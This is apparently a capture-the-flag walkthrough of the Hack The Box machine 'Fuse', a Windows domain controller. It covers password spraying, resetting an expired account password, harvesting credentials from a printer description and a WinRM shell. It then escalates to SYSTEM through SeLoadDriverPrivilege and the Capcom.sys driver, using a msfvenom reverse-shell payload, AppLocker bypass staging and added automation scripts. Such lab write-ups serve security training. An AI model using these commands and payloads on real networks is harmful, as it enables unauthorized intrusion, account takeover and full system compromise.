Fuse

Enumeration
As usual, we start with an nmap scan in order to find the open ports on the target machine.
The following nmap command scans the target for open ports quickly and saves the output to a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.193 -oN allPorts
-sS
use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000
nmap will try to keep the sending rate at or above 5000 packets per second.
-p-
scan the entire port range, from 1 to 65535.
-T5
insane mode, the fastest of nmap's timing templates.
-Pn
assume the host is online (skip host discovery).
-n
scan without reverse DNS resolution.
-oN
save the scan result into a file, in this case the allPorts file.
# Nmap 7.92 scan initiated Fri Jan 7 21:16:49 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.193
Warning: 10.10.10.193 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.193
Host is up (0.100s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49667/tcp open unknown
49675/tcp open unknown
49676/tcp open unknown
49678/tcp open unknown
49700/tcp open unknown
# Nmap done at Fri Jan 7 21:17:29 2022 -- 1 IP address (1 host up) scanned in 40.16 seconds
As we see, there are quite a lot of ports open.
Let's try to obtain the services and versions of these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,5985,9389 10.10.10.193 -oN targeted
-sC
performs the scan using the default set of scripts.
-sV
enables version detection.
-oN
save the scan result into a file, in this case the targeted file.
# Nmap 7.92 scan initiated Fri Jan 7 21:18:38 2022 as: nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,5985,9389 -oN targeted 10.10.10.193
Nmap scan report for 10.10.10.193
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-07 20:31:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h53m00s, deviation: 4h37m10s, median: 12m59s
| smb2-time:
| date: 2022-01-07T20:31:53
|_ start_date: 2022-01-07T20:29:22
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2022-01-07T12:31:56-08:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 7 21:19:35 2022 -- 1 IP address (1 host up) scanned in 57.23 seconds
First things first, let's add the domain names reported by the LDAP and SMB scripts to the /etc/hosts file.
nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa-virtualbox
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.193 fabricorp.local fuse.fabricorp.local
If we take a look at the website on http://10.10.10.193, we'll see a printer website (a PaperCut print-log page).

In the Print Logs section there are three logs. Clicking the View button of each log shows the print jobs together with the usernames that submitted them.

Exploitation
Let's save the users seen in the print logs, pmerton, tlavel, sthompson, bhult and administrator, to a file called users. For candidate passwords we can use the cewl tool, which builds a wordlist from the words found on a web page; a company's own pages are a good source of guesses such as the company name.
cewl -w passwords http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers
-w
write the output to a file.
--with-numbers
accept words with numbers.
Now that we've got a user list and a wordlist, we can spray them against the SMB service with crackmapexec. The following command tries every user with every password from the wordlist; --continue-on-success keeps going after a hit, and the grep at the end hides the logon failures. Keep in mind that every attempt counts against the domain lockout threshold, so keep the wordlist small and check the password policy before spraying anything bigger.
crackmapexec smb 10.10.10.193 -u users -p passwords --continue-on-success | grep -v FAILURE
-u
users file.
-p
passwords file.
--continue-on-success
continue authentication attempts even after a success.
grep -v
select lines which don't match, here dropping the FAILURE lines.
SMB 10.10.10.193 445 FUSE [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\tlavel:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\bhult:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE
crackmapexec reports STATUS_PASSWORD_MUST_CHANGE for tlavel and bhult: the password Fabricorp01 is correct for both accounts, but it has expired, so it can't be used for a normal logon until it is changed.
The idea here is to change the password of the bhult user and then use it against the MS-RPC interface with rpcclient. Once authenticated, we can enumerate all the domain users, as we have done in other HTB machines. Let's change the bhult password remotely with the smbpasswd tool. On a real engagement this is an intrusive change to someone's account, so agree it with the client and note it in the report.
smbpasswd -r 10.10.10.193 -U "bhult"
Old SMB password: Fabricorp01
New SMB password: alfa8sa!$
Retype new SMB password: alfa8sa!$
Password changed for user bhult on 10.10.10.193.
Now let's log in to the RPC server with the user bhult and the password alfa8sa!$.
You will have to do this quickly: a scheduled task on the box resets the password shortly after you change it, so the new credential is only valid for a short window.
rpcclient -U 'bhult%alfa8sa!$' 10.10.10.193
rpcclient $>
From here we can enumerate several things. The first is the domain users.
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
We can clean the output of the domain users and write it into a file.
rpcclient -U 'bhult%alfa8sa!$' 10.10.10.193 -c "enumdomusers" | grep -oP "\[.*?\]" | grep "0x" -v | tr -d "[]" > users
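Because the password is reverted so soon after it is changed, it helps to script the whole race: reset the password and fire the rpcclient queries in the same run, and parse the user list and the printer descriptions on the way out. The following script is an added example, not code from the original post. It assumes that smbpasswd -s reads the old and new passwords from stdin (as documented in smbpasswd(8)) and takes target and credentials as arguments; the parsing functions are exercised on a constructed rpcclient output sample, the file name users is the same one used in the post.

```shell
#!/bin/sh
# Added example (not from the original post): reset an expired AD password
# over SMB and run the rpcclient enumeration immediately afterwards, so it
# lands inside the short window before the scheduled task reverts it.
# Assumes smbpasswd -s reads old/new/new passwords from stdin (smbpasswd(8)).
#   ./fuse-enum.sh 10.10.10.193 bhult 'Fabricorp01' 'alfa8sa!$'
set -eu

# Turn rpcclient's "user:[name] rid:[0x...]" lines into bare usernames.
# Only the user:[...] field is taken, so RIDs can never leak into the list.
parse_users() {
    sed -n 's/^user:\[\([^]]*\)\].*/\1/p'
}

# Pull the description field out of enumprinters output; on Fuse that is
# where the scan2docs password is stored.
parse_printer_descriptions() {
    sed -n 's/^[[:space:]]*description:\[\(.*\)\]$/\1/p'
}

reset_and_enumerate() {
    target=$1 user=$2 old=$3 new=$4
    # smbpasswd -s: no prompts, read old password, new password, new password.
    printf '%s\n%s\n%s\n' "$old" "$new" "$new" \
        | smbpasswd -r "$target" -U "$user" -s
    # No pause here: the new password is only briefly valid.
    rpcclient -U "${user}%${new}" "$target" -c enumdomusers \
        | parse_users | tee users
    rpcclient -U "${user}%${new}" "$target" -c enumprinters \
        | parse_printer_descriptions
}

# Only touch the network when all four arguments are given.
if [ "$#" -eq 4 ]; then
    reset_and_enumerate "$@"
fi
```

The users file it writes is the same one fed to crackmapexec in the next step; the printer description is printed so the scan2docs password is captured in the same run, even if the password is reverted before you get to type a second command.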
We can also enumerate printers. Doing so reveals a password in the description of the printer:
rpcclient $> enumprinters
flags:[0x800000]
name:[\\10.10.10.193\HP-MFT01]
description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]
Now that we have a list of the domain users and the $fab@s3Rv1ce$1 password, let's see whether winrm gives us a shell as any user with that password.
crackmapexec winrm 10.10.10.193 -u users -p '$fab@s3Rv1ce$1' --continue-on-success
-u
users file.
-p
password; here a single password string rather than a file.
--continue-on-success
continue authentication attempts even after a success.
WINRM 10.10.10.193 5985 FUSE [*] Windows 10.0 Build 14393 (name:FUSE) (domain:fabricorp.local)
WINRM 10.10.10.193 5985 FUSE [*] http://10.10.10.193:5985/wsman
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\Administrator:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\Guest:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\krbtgt:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\DefaultAccount:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [+] fabricorp.local\svc-print:$fab@s3Rv1ce$1 (Pwn3d!)
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\bnielson:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\sthompson:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\tlavel:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\pmerton:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\svc-scan:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\bhult:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\dandrews:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\mberbatov:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\astein:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\dmuir:$fab@s3Rv1ce$1
And we see we can get a shell with the user svc-print and the password $fab@s3Rv1ce$1. Once we have the shell, we can grab the user flag.
evil-winrm -i 10.10.10.193 -u 'svc-print' -p '$fab@s3Rv1ce$1'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami
fabricorp\svc-print
*Evil-WinRM* PS C:\Users\svc-print\Documents> type \users\svc-print\desktop\user.txt
504c8acb72ed8276d310291e93713482
Privilege Escalation
Let's see what privileges we have.
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
The SeLoadDriverPrivilege privilege is enabled. If you search how to escalate privileges with that privilege, you'll find a great article from Tarlogic which explains how to become the NT AUTHORITY\SYSTEM user: a user holding SeLoadDriverPrivilege can call NtLoadDriver with a service key that lives under its own HKCU hive, so it can load any driver it can write to disk, and the known-vulnerable Capcom.sys driver then gives arbitrary kernel code execution.
The article uses the EoPLoadDriver tool. But on its official GitHub only a .cpp file is available, which means we have to compile it ourselves on Windows.
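Before building the tool it is worth seeing what it actually changes on the box. The PowerShell below is an added example, not code from the post or from Tarlogic: run from the evil-winrm session, it performs the pre-flight checks (is the privilege really in the token, is the drop folder writable) and then stages the same service key under HKCU that EoPLoadDriver.exe creates (ImagePath and Type values), printing the \Registry\User\<SID>\... path that NtLoadDriver will be given. The key name alfa8sa and the spool\drivers\color folder are the ones used for the drop later in the post and are assumptions you can change; the NtLoadDriver call itself is still left to EoPLoadDriver.exe.

```powershell
# Added example (not from the original post or Tarlogic's tool): the
# pre-flight checks and the HKCU registry staging behind the
# SeLoadDriverPrivilege technique. Key name and folder are placeholders.
$KeyName   = 'alfa8sa'
$StageDir  = 'C:\Windows\System32\spool\drivers\color'
$DriverSys = Join-Path $StageDir 'Capcom.sys'

# 1. Is the privilege actually in this token? Without it NtLoadDriver
#    fails with STATUS_PRIVILEGE_NOT_HELD no matter what the key says.
$priv = whoami /priv | Select-String 'SeLoadDriverPrivilege'
if (-not $priv) { throw 'SeLoadDriverPrivilege not present in the token' }

# 2. Can we write to the staging folder? It is on the AppLocker bypass list
#    because it is user-writable yet under %WINDIR%, which the default
#    AppLocker rules trust.
$probe = Join-Path $StageDir ('probe_{0}.txt' -f [guid]::NewGuid())
try {
    Set-Content -Path $probe -Value 'x' -ErrorAction Stop
    Remove-Item -Path $probe -ErrorAction Stop
} catch {
    throw "$StageDir is not writable: $($_.Exception.Message)"
}

# 3. Stage the service key under HKCU. NtLoadDriver accepts a key under
#    \Registry\User\<SID>\..., which is what lets an unprivileged user
#    point it at an arbitrary .sys file.
$KeyPath = "HKCU:\System\CurrentControlSet\$KeyName"
New-Item -Path $KeyPath -Force | Out-Null
# ImagePath is an NT path; \??\ maps into the Win32 drive namespace.
New-ItemProperty -Path $KeyPath -Name ImagePath -PropertyType String `
    -Value "\??\$DriverSys" -Force | Out-Null
# Type 1 = SERVICE_KERNEL_DRIVER
New-ItemProperty -Path $KeyPath -Name Type -PropertyType DWord `
    -Value 1 -Force | Out-Null

# Show what was staged and the NT path EoPLoadDriver passes to NtLoadDriver.
$sid = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
Get-ItemProperty -Path $KeyPath | Select-Object ImagePath, Type
"\Registry\User\$sid\System\CurrentControlSet\$KeyName"

# 4. Cleanup once the exploit has run: the key otherwise stays behind as an
#    obvious artefact for the blue team (and a persistence false positive).
# Remove-Item -Path $KeyPath -Recurse -Force
```

If step 3 is run, EoPLoadDriver.exe simply recreates the same values, so there is no harm in staging by hand first; the important part for a practitioner is the cleanup at the end, which neither tool does for you.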
First, let's create a folder on the desktop called FUSE, and open a command prompt inside it.

Next, let's clone the EoPLoadDriver GitHub repository, which contains the .cpp file.
git clone https://github.com/TarlogicSecurity/EoPLoadDriver/
Cloning into 'EoPLoadDriver'...
remote: Enumerating objects: 10, done.
remote: Total 10 (delta 0), reused 0 (delta 0), pack-reused 10
Receiving objects: 100% (10/10), 5.16 KiB | 1.72 MiB/s, done.
Resolving deltas: 100% (2/2), done.
Then we'll have to open Visual Studio and create a new project.

Select the Console App.

Insert the project name.

Once the project is open, we'll have to copy the eoploaddriver.cpp code and paste it into the project. Then we'll have to delete the first include line, #include "stdafx.h", since the new project has no precompiled header of that name.

To compile it, select Release and x64.

And finally, press Build > Rebuild Solution.

Once it ends, it will store the binary at C:\Users\alfa8sa\source\repos\EoPLoadDriver\x64\Release\EoPLoadDriver.exe. Let's move it to the FUSE folder.
The Capcom.sys driver file is also needed. Download it from its GitHub repository and move it to the FUSE folder.
Then we'll have to clone the ExploitCapcom repository and compile its ExploitCapcom.sln solution with Visual Studio as well.
Cloning into 'ExploitCapcom'...
remote: Enumerating objects: 58, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 58 (delta 11), reused 11 (delta 4), pack-reused 34
Receiving objects: 100% (58/58), 142.24 KiB | 2.54 MiB/s, done.
Resolving deltas: 100% (19/19), done.
Then, in Visual Studio, press File > Open > Project/Solution... and select the ExploitCapcom.sln file. Next, select ExploitCapcom.cpp in the Solution Explorer section.

At the end of the code, we can see that the binary launches the cmd.exe program. But I am going to change that, because I want to execute a malicious file called reverse.exe, which is going to send us back a reverse shell. To avoid AppLocker, I will place the malicious file in a directory listed on the UltimateAppLockerByPassList, i.e. a folder that is user-writable but still covered by AppLocker's default allow rule for everything under %WINDIR%.

Then compile it like before, and move the binary to the FUSE folder.

Finally, we have the EopLoadDriver.exe, ExploitCapcom.exe and Capcom.sys binaries in our FUSE folder.

Let's transfer those to our Linux machine with Python's http.server module. On the Windows machine:
python -m http.server
On our Linux machine.
wget http://192.168.1.190:8000/EopLoadDriver.exe
wget http://192.168.1.190:8000/ExploitCapcom.exe
wget http://192.168.1.190:8000/Capcom.sys
Now we need to create the malicious file which will send us a reverse shell. It has to be named reverse.exe, since that is the path compiled into ExploitCapcom.exe.
msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.22 lport=4444 -f exe -o reverse.exe
Now we have to upload those binaries to the victim machine. We can do it with the upload functionality of evil-winrm. Let's move to the C:\Windows\System32\spool\drivers\color directory on the victim machine, and upload them with evil-winrm.
upload EopLoadDriver.exe
upload ExploitCapcom.exe
upload Capcom.sys
upload reverse.exe
dir
Directory: C:\windows\system32\spool\drivers\color
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/11/2022 2:37 PM 10576 Capcom.sys
-a---- 7/16/2016 6:12 AM 1058 D50.camp
-a---- 7/16/2016 6:12 AM 1079 D65.camp
-a---- 2/11/2022 2:35 PM 15360 EopLoadDriver.exe
-a---- 2/11/2022 2:36 PM 1875968 ExploitCapcom.exe
-a---- 7/16/2016 6:12 AM 797 Graphics.gmmp
-a---- 7/16/2016 6:12 AM 838 MediaSim.gmmp
-a---- 7/16/2016 6:12 AM 786 Photo.gmmp
-a---- 7/16/2016 6:12 AM 822 Proofing.gmmp
-a---- 2/11/2022 2:37 PM 7168 reverse.exe
-a---- 7/16/2016 6:12 AM 218103 RSWOP.icm
-a---- 7/16/2016 6:12 AM 3144 sRGB Color Space Profile.icm
-a---- 7/16/2016 6:12 AM 17155 wscRGB.cdmp
-a---- 7/16/2016 6:12 AM 1578 wsRGB.cdmp
Before running the binaries, let's set up a netcat listener on port 4444.
nc -lvnp 4444
-l
listen mode.
-v
verbose mode.
-n
numeric-only IP, no DNS resolution.
-p
specify the port to listen on.
Now all we have to do is run the following commands. The first argument to EopLoadDriver.exe is the registry key, relative to HKCU, under which it creates the driver service entry (the key name is arbitrary); the second is the path to the driver to load.
C:\windows\system32\spool\drivers\color\EopLoadDriver.exe System\CurrentControlSet\alfa8sa C:\windows\system32\spool\drivers\color\Capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\alfa8sa
NTSTATUS: 00000000, WinError: 0
C:\windows\system32\spool\drivers\color\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000038
[*] Shellcode was placed at 00000205D3BD0008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program
And we should get the reverse shell as the NT AUTHORITY\SYSTEM user. Then all we have to do is reap the harvest and take the root flag.
listening on [any] 4444 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.193] 49814
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\windows\system32\spool\drivers\color>whoami
whoami
nt authority\system
C:\windows\system32\spool\drivers\color>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
6ad78ce332c9a222c30b6108f4ed148f